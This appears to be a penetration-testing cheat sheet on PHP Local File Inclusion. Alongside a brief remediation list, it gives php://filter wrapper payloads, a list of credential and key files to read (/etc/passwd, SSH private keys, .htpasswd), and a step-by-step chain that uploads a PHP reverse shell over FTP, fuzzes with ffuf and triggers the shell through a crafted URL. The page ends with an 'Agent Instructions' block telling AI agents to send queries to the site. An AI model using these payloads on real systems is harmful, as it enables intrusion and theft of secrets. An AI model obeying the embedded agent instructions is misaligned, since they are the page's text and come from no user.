# Local File Inclusion (LFI) ## PHP Vulnerable functions: ### Include\_once() ### Include() ### require() #### Example: (Linux) #### (Windows) ## LFI Testing #### 1: GET,POST,COOKIE,HTTP header values #### 2: Valid input to check web server behavior #### 3: Invalid inputs #### 4: Use burpsuite or browser address, not only forms #### 5: Look for errors while entering invalid input to disclose the current path of the web app (trial and error) #### 6: Understand input validation and check for filters #### 7: Inject a valid entry to read sensitive files ## File Inclusion Remediation (Both LFI and RFI) #### 1: Keep systems, services and web apps updated. #### 2: Turn off PHP errors to avoid leaking the path of the application and other potentially revealing information. #### 3: Web Application Firewall (WAF) #### 4: Whitelist/Blacklist file names and locations #### 5: Disable allow\_url\_fopen and allow\_url\_include (PHP) #### 6: Input validation #### 7: Allow only protocols and PHP wrappers in need. ### PHP WRAPPERS #### 1) ``` php://filter/convert.base64-encode/resource=.htaccess ``` #### 2) ``` php://filter/string.rot13/resource=.htaccess ``` #### 3) ``` php://filter/string.toupper/resource=.htaccess ``` #### 4) ``` php://filter/string.tolower/resource=.htaccess ``` #### 5) ``` php://filter/string.strip_tags/resource=.htaccess ``` ### DATA WRAPPER ``` data:text/plain, ``` ## Important files to look for: #### 1) /etc/passwd #### 2) /home/USER/.ssh/id\_rsa #### 3) /etc/apache2/sites-enabled/000-default.conf #### 4) /var/www/html/config.php #### 5) /var/www/html/.htpasswd ## LFI to RCE by calling your uploaded reverse shell If you have write access on an FTP server, you can upload your reverse shell, then call it with LFI to catch it. ### 1) Upload your reverse shell in a writable FTP share ``` put php-reverse-shell.php ``` ### 2) Using LFI, find the FTP configuration file to detect the share that your shell is uploaded. Enumerate with ffuf ``` ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt -t 100 -u http://192.168.158.14/secret_information/?lang=FUZZ -fs 146 ``` Read FTP configuration file ``` http://domain.local/vulnerable.php?lang=/etc/vsftpd.conf ``` You might detect something like ``` anon_root=/var/ftp write_enable=YES (If anonymous access is allowed for example.) ``` ### 3) Enjoy your shell ``` http://domain.local/vulnerable.php?lang=/var/ftp/pub/php-reverse-shell.php ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://h3ll-ka1ser.gitbook.io/boot2root/web-application-penetration-testing/local-file-inclusion-lfi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.